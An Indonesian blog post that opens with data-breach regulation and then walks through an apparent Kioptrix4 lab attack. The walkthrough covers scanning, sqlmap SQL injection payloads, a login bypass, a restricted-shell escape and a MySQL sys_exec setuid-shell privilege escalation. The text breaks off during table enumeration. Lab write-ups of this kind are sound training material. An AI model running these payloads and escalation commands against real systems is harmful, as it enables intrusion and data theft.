Kisah Kioptrix4 kali ini tentang terjadinya data breach atau pelanggaran data. Permasalahan ini menjadi isu global, meskipun ia telah terjadi sebelum munculnya era information overload, namun trend dimasa depan kian mengkhawatirkan. Negara super power seperti Amerika Serikat sendiri mengalami trend kenaikan insiden data breach setiap tahunnya sejak tahun 2004 hingga 2019 (Gambar1). Padahal Amerika adalah negara yang memulai sejarah Internet melalui DARPA.
ISO (International Standard Organization) telah menetapkan standard baru terkait perlindungan terhadap resiko data breach, yaitu ISO 27040. Ia adalah bagian dari keluarga ISO 27000 dan membuat rincian lebih lanjut dari standard ISO 27002. Dalam standard tersebut, data breach didefinsikan sebagai compromise of security that leads to the accidental or unlawful destruction, loss, alteration, unauthorized disclosure of, or access to protected data transmitted, stored or otherwise processed (Sumber: data breach wikipedia). Dalam bahasa Indonesia kurang lebih bermakna adanya pelanggaran keamanan informasi yang mengarah pada perusakan, kehilangan, perubahan, pengungkapan yang tidak disengaja atau tidak sah, atau akses ke data yang dilindungi untuk ditransmisikan, disimpan atau diproses.
Tentu nasib Indonesia bisa jadi lebih parah ketimbang Amerika Serikat, sayangnya data akurat belum ada. Hal tersebut bisa jadi karena belum terbangunnya ekosistem trust and privacy di industri keamanan siber nasional, akibatnya berbagi data insiden belum bisa dilakukan.
Pemerintah Indonesia sendiri melalui Kementerian Komunikasi dan Informatika telah merespons situasi ini dengan memperbaiki kebijakan dengan memperbesar porsi perlindungan data pribadi pada PP No. 71 tahun 2019 tentang Penyelenggaraan Sistem dan Transaksi Elektronik pada pasal 14 hingga 18. Peraturan Pemerintah ini merupakan revisi terhadap PP No.82 Tahun 2012. Lebih jauh lagi Pemerintah dan Parlemen telah mensepakati pembahasan Draft Undang-Undang Perlindungan Data Pribadi di dalam Program Legislasi Nasional (Prolegnas) 2020.
Filosofi dan prinsip yang menjiwai kebijakan tersebut sangat didominasi oleh GDPR atau General Data Protection Regulation. Ia merupakan regulasi perlindungan di Uni Eropa yang ditetapkan tiga tahun yang lalu. Tentunya dengan berbagai penyesuaian dengan situasi di Indonesia.
Mesin Kioptrix4 (dapat diunduh di situs vulnhub) dalam artikel ini memberikan ilustrasi teknis bagaimana data-data credential yang tersimpan di dalam sebuah database tercuri. Ia menceritakan bagaimana mindset dan teknik yang dilakukan seorang cyber criminal dalam melakukan pembobolan data. Seperti pada pembahasan serial terdahulu, kisah serangan siber ini melalui tiga tahap yaitu: Tahap Scanning dan Enumeration, Tahap Mapping Attack Surface dan Tahap Exploitation dan Post-Exploitation. Melalui kisah ini semoga kewaspadaan para Penyelenggara Sistem Elektronik dapat senantiasa ditingkatkan. Semoga bermanfaat.
Tahap Scanning dan Enumeration
Pada tahap ini, kita akan mengumpulkan informasi terkait target dengan perangakt nmap. Opsi yang digunakan adalah -p-, tujuannya untuk mendeteksi seleuruh port yang aktif dan menerima layanan. Selanjutnya, kita juga menggunakan opsi -A untuk melakukan identifikasi aplikasi , sistem operasi dan default script. Berdasarkan informasi yang diperoleh, tampak bahwa server Kioptrix4 adalah sebuah web server (apache vversi 2.2.8) dan file sharing server (samba versi 3.0.28a ). Untuk kebutuhan administrasi server maka Kioptrix4 juga menggunakan layanan SSH (OpenSSH versi 4.7p1).
kali@kali:~$ nmap -p- -A 192.168.216.151
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-22 23:26 EDT
Nmap scan report for 192.168.216.151 (192.168.216.151)
Host is up (0.0013s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 9h00m01s, deviation: 2h49m42s, median: 7h00m01s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2020-04-23T06:27:17-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.79 seconds
kali@kali:~$
Penelusuran lebih lanjut pada layanan HTTP, kita menjumpai beberapa folder dan file menarik. File yang penting ditelusuri adalah index.php dan checklogin.php yang digunakan dalam form untuk login sebagai mana gambar berikut ini.
ali@kali:~$ dirb http://192.168.216.151
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Apr 22 23:48:51 2020
URL_BASE: http://192.168.216.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.216.151/ ----
+ http://192.168.216.151/cgi-bin/ (CODE:403|SIZE:330)
==> DIRECTORY: http://192.168.216.151/images/
+ http://192.168.216.151/index (CODE:200|SIZE:1255)
+ http://192.168.216.151/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.216.151/john/
+ http://192.168.216.151/logout (CODE:302|SIZE:0)
+ http://192.168.216.151/member (CODE:302|SIZE:220)
+ http://192.168.216.151/output (CODE:200|SIZE:0)
+ http://192.168.216.151/server-status (CODE:403|SIZE:335)
---- Entering directory: http://192.168.216.151/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.151/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Apr 22 23:48:56 2020
DOWNLOADED: 4612 - FOUND: 7
kali@kali:~$
Dengan menggunakan perangkat burpsuite, terlihat bahwa setelah tombol login ditekan maka script index.php akan mengalihkan proses authentikasi pada script checklogin.php. Dimana ada tiga parameter yang terlibat dalam proses tersebut.
Dengan menguji parameter mypassword dengan karakter pengujian yaitu: ” ‘ “, muncul pesan error sebagaimana gambar 4. Hal ini menunjukkan bahwa parameter tersebut kemungkinan memiliki kerentanan SQL Injection.
Untuk melakukan verifikasi terhadap dugaan adanya kerentanan SQL Injection, kita akan menggunakan perangkat sqlmap. Perangkat berbasis python ini membutuhkan tiga opsi untuk memverifikasi dugaan kita, yaitu opsi -u untuk url menunjukkan checklogin.php, kemudian opsi –data karena kita menggunakan POST Method dalam pengiriman data pada form serta opsi -p untuk menunjukkan parameter mypassword yang akan kita uji. Setelah sqlmap dijalankan, ternyata dugaan kita benar adanya bahwa parameter mypassword memiliki kerentanan SQL Injection.
kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=admin&Submit=Login' -p mypassword
___
__H__
___ ___["]_____ ___ ___ {1.4#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... 
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:17:12 /2020-04-23/
[00:17:12] [INFO] testing connection to the target URL
[00:17:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:17:13] [INFO] testing if the target URL content is stable
[00:17:13] [INFO] target URL content is stable
[00:17:13] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[00:17:13] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[00:17:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:17:38] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:17:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:17:38] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
[00:17:42] [INFO] POST parameter 'mypassword' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --code=302)
[00:17:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[00:17:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[00:17:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[00:17:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[00:17:42] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[00:17:43] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[00:17:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:17:43] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[00:17:43] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:17:43] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[00:17:43] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[00:17:43] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[00:17:43] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[00:17:43] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[00:17:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[00:17:43] [INFO] testing 'MySQL inline queries'
[00:17:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[00:17:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[00:17:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[00:17:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[00:17:43] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[00:17:43] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[00:17:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:17:53] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[00:17:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:17:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:17:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:17:53] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[00:18:02] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1') and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[00:18:02] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[00:18:03] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[00:18:03] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[00:18:03] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[00:18:03] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[00:18:03] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[00:18:03] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[00:18:03] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[00:18:04] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[00:18:04] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[00:18:04] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[00:18:04] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 321 HTTP(s) requests:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=admin' AND (SELECT 6095 FROM (SELECT(SLEEP(5)))CRdG)-- LUNZ&Submit=Login
---
[00:18:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[00:18:10] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[00:18:10] [WARNING] you haven't updated sqlmap for more than 112 days!!!
[*] ending @ 00:18:10 /2020-04-23/
kali@kali:~$
Apabila kita telusuri kerentanan SQL Injection pada parameter mypassword yang terletak di script checklogin.php dengan bantuan perangkat burpsuite maka kita akan menemukan satu lagi potensi kerentanan Local File Inclusion (LFI) pada parameter username yang terletak pada script member.php. Perhatikan beberapa gambar berikut berdasarkan penelusuran menggunakan burpsuite.
Berdasarkan penuluran pada alur autentikasi yang berawal dari login form maka kita menemukan adanya sasaran tambahan, yaitu adanya kerentanan Local File Inclusion (LFI) pada parameter username. Serta ditemukan adanya temuan tiga user account pada Server Kioptrix4, yaitu: loneferret, john dan robert.
Kita melanjutkan kegiatan enumeration pada layanan berbagi file yang menggunakan aplikasi Samba. Kita akan menggunakan perangkat enum4linux untuk mengumpulkan informasi. Berdasarkan penelusuran pada port 139 dan port 445, tidak ada folder yang di share dan juga tidak ada informasi tentang user account yang menggunakan layanan tersebut.
kali@kali:~$ enum4linux -A 192.168.216.151
Unknown option: A
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Apr 23 01:55:01 2020
==========================
| Target Information |
==========================
Target ........... 192.168.216.151
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=======================================================
| Enumerating Workgroup/Domain on 192.168.216.151 |
=======================================================
[+] Got domain/workgroup name: WORKGROUP
===============================================
| Nbtstat Information for 192.168.216.151 |
===============================================
Looking up status of 192.168.216.151
KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
KIOPTRIX4 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
========================================
| Session Check on 192.168.216.151 |
========================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
kali@kali:~$
Tahap Kedua : Mapping Attack Surface
Berdasarkan informasi yang dihimpun pada tahap pertama, kita dapat membuat pemetaan terhadap kerentanan dan kemungkinan serangan siber yang bisa dilakukan, sebagaimana gambar 12. Setelah ditelusuri, seluruh potensi serangan melalui Remote Code Injection (RCE) tidak valid. Hanya ada dua potensi serangan siber yang valid dan dapat dilakukan, yaitu SQL Injection dan Local File Inclusion.
Tahap Ketiga : Exploitation dan Post Exploitation
Pada tahap sebelumnya, kita telah mengidentifikasi adanya dua kerentanan (SQL Injection dan Local FIle Inclusion) untuk mendapatkan limited shell pada server Kioptrix4. Dalam artikel kali ini, kita hanya melakukan serangan pada SQL Injection saja.
Untuk melakukan serangan siber terhadap kerentanan SQL Injection, kita akan melakukan dua cara. Cara pertama dengan cara manual dan cara kedua dengan cara otomatis dengan bantuan perangkat sqlmap.
Cara Manual Untuk Menyerang SQL Injection
Sebagaimana diketahui bahwa parameter mypassword yang terdapat pada script check_login.php terdapat kerentanan SQL Injection. Kita juga telah menemukan tiga buah valid user account (loneferret, john dan robert). Dengan demikian kita akan coba mem-bypass login form untuk ketiga user tersebut. Setelah kita memberikan input pada parameter mypassword dengan ‘ or 1=1– – maka kita berhasil mendapatkan credential dua buah user account yaitu john dan robert. Sedangkan loneferret belum berhasil ditemukan. Hal tersebut dapat dilihat pada gambar berikut:
Berbekal credential yang kita dapat, maka kita akan mengakses server Kioptrix4 menggunakan salah satu crudential yaitu: john. Setelah kita berhasil login, ternyata kita berada dalam lingkungan shell yang restricted. Kita tak dapat menggunakan perintah standard seperti id atau whoami sekalipun. Untuk keluar dari “restricted shell: ini, maka kita akan menggunakan perintah echo os.system(“/bin/bash”) dan Alhamdulillah kita berhasil mendapatkan limited shell (Gambar 15).
Setelah kita lakukan penelusuran terhadap Sistem Operasi, ternyata server Kioptrix4 menggunakan Ubuntu 8.04 dan kernel 2.6.24. Namun sayangnya server ini tidak dilengkapi compiler gcc, padahal exploit untuk Ubuntu versi tersebut ada.
Kita coba penelusuran dengan mencari kata “password”, bisa saja terjadi programmer tidak menerapkan best practice dalam secure coding. Kita menggunakan perintah find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null, dan kita menemukan potensi kecerobohan tersbut pada script robert.php. Hal tersebut dapat dilihat pada gambar sebagai berikut:
Selanjutnya, kita melakukan penyelidikan pada file rober.php dan menemukan bahwa password root untuk MySQL tidak ada atau blank. Hal tersebut dapat dilihat pada sorce code berikut ini:
john@Kioptrix4:/tmp$ cat /var/www/robert/robert.php
<?php
session_start();
if(!session_is_registered(myusername)){
header("location:../index.php");
}else{
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='".$_SESSION['myusername']."'");
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
$row = mysql_fetch_array($result);
}
else {
echo "Something went wrong";
}
ob_end_flush();
?>
<html><body>
<table width="500" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC">
<tr>
<td>
<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF">
<tr>
<td align="center" colspan="3"><strong>Member's Control Panel </strong></td>
</tr>
<tr>
<td width="30">Username</td>
<td width="6">:</td>
<td width="464"><?php print ($row[1]);?></td>
</tr>
<tr>
<td width="30">Password</td>
<td width="6">:</td>
<td width="464"><?php print($row[2]);?></td>
</tr>
<tr>
<td>Â
<form method="link" action="logout.php">
<input type=submit value="Logout">
</form>
</td>
<td>Â </td>
</tr>
</table>
</td>
</tr>
</table>
</body></html>
<?php
}
?>
john@Kioptrix4:/tmp$
Selanjutnya kita melakukan login pada mysql dengan root dan tanpa password, hasilnya kita dapat masuk ke dalam database sebagaimana gambar dibawah ini.
Hal ini tentu sebuah kemajuan. Namun kita masih belum berhasil mendapatkan hak akses root. Untuk itu kita coba menyelidiki permission dari mysql, mudah-mudahan database ini memiliki berjalan dengan hak akses root. Ternyata setelah kita menjalankan perintah ps aux | grep mysql, hal tersebut benar adanya sebagaimana gambar berikut ini.
Pada MySQL ada fungsi bernama User Defined Function atau UDF yang berfungsi untuk menjalankan perintah pada sistem operasi. Tentu hal ini merupakan peluang untuk meningkatkan hak akses. Untuk itu kita akan mencoba memastikan bahwa fungsi tersebut berjalan pada MySQL di server Kioptrix4. Ternyata setelah dilakukan verifikasi (Gambar 19), fungsi UDF digunakan dalam database dimana fungsi sys_exec dapat kita gunakan untuk melakukan eksekusi perintah pada sistem operasi. Tentunya dengan hak akses root.
Dengan demikian kita dapat mengeksekusi /bin/sh dengan hak akses root. Untuk itu kita akan meng-copy dari folder bin ke folder tmp, memberikan ownership dan menjalankan program tersebut sebagai root. Adapun perintah yang akan dijalankan oleh fungsi sys_exec adalah select sys_exec(‘cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh’); sebagaimana gambar berikut (Gambar 20).
Setelah perintah tersebut dieksekusi maka setelah kita menjalankan program /bin/sh, maka kita telah berhasil meningkatkan hak akse menjadi root sebagaimana gambar berikut.
Cara Otomatis Untuk Menyerang SQL Injection
Berdasarkan analisis terdahulu bahwa parameter mypassword pada script checklogin.php memiliki kerentanan, maka kita terlebih menghimpun beberapa informasi, yang pertama adalah jumlah user pada database (opsi –users):
kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=pass&Submit=Login' -p mypassword --technique=B --users
___
__H__
___ ___["]_____ ___ ___ {1.4#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:40:46 /2020-04-23/
[08:40:46] [INFO] resuming back-end DBMS 'mysql'
[08:40:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
---
[08:40:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:40:46] [INFO] fetching database users
[08:40:46] [INFO] fetching number of database users
[08:40:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:40:46] [INFO] retrieved:
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
6
[08:40:50] [INFO] retrieved: 'root'@'localhost'
[08:40:54] [INFO] retrieved: 'root'@'Kioptrix4'
[08:40:58] [INFO] retrieved: 'root'@'127.0.0.1'
[08:41:03] [INFO] retrieved: 'debian-sys-maint'@'localhost'
[08:41:09] [INFO] retrieved: ''@'localhost'
[08:41:12] [INFO] retrieved: ''@'Kioptrix4'
database management system users [6]:
[*] ''@'Kioptrix4'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'Kioptrix4'
[*] 'root'@'localhost'
[08:41:15] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[08:41:15] [WARNING] you haven't updated sqlmap for more than 113 days!!!
[*] ending @ 08:41:15 /2020-04-23/
kali@kali:~$
Selanjutnya, kita ingin menyelidiki status user yang saat ini kita akses (opsi –current-user). Apabila user tersebut adalah Data Base Administrator tentu sebuah keuntungan (opsi –is-dba). Dan tentu saja informasi jenis database yang akan kita serang (opsi –banner).
kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=a&Submit=Login' -p mypassword --batch -v 0 --fingerprint --banner --current-db --current-user --is-dba
___
__H__
___ ___[.]_____ ___ ___ {1.4#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:03:28 /2020-04-23/
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=admin' AND (SELECT 6095 FROM (SELECT(SLEEP(5)))CRdG)-- LUNZ&Submit=Login
---
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
comment injection fingerprint: MySQL 5.0.51
banner: '5.0.51a-3ubuntu5.4'
current user: 'root@localhost'
current database: 'members'
current user is DBA: True
[*] ending @ 21:03:38 /2020-04-23/
Informasi selanjutnya adalah informasi terkait nama-nama database di dalam server (opsi –dbs):
kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=pass&Submit=Login' -p mypassword --technique=B --dbs
___
__H__
___ ___["]_____ ___ ___ {1.4#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:36:36 /2020-04-23/
[08:36:36] [INFO] resuming back-end DBMS 'mysql'
[08:36:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
---
[08:36:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:36:36] [INFO] fetching database names
[08:36:36] [INFO] fetching number of databases
[08:36:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:36:36] [INFO] retrieved:
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
3
[08:36:40] [INFO] retrieved: information_schema
[08:36:44] [INFO] retrieved: members
[08:36:45] [INFO] retrieved: mysql
available databases [3]:
[*] information_schema
[*] members
[*] mysql
[08:36:46] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[08:36:46] [WARNING] you haven't updated sqlmap for more than 113 days!!!
[*] ending @ 08:36:46 /2020-04-23/
kali@kali:~$
Terlihat bahwa database yang menarik untuk ditelusuri adalah database bernama members. Penyeledikan selanjutnya adalah informasi terkait tabel di dalam database tersebut (opsi -D dan opsi –tables).
kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=pass&Submit=Login' -p mypassword --technique=B -D members --tables
___
__H__
___ ___[.]_____ ___ ___ {1.4#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:46:27 /2020-04-23/
[08:46:27] [INFO] resuming back-end DBMS 'mysql'
[08:46:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
---
[08:46:27] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:46:27] [INFO] fetching tables for database: 'members'
[08:46:27] [INFO] fetching number of tables for database 'members'
[08:46:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:46:27] [INFO] retrieved:
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
1
[08:46:32] [INFO] retrieved: members
Database: members
[1 table]
+---------+
| members |
+---------+
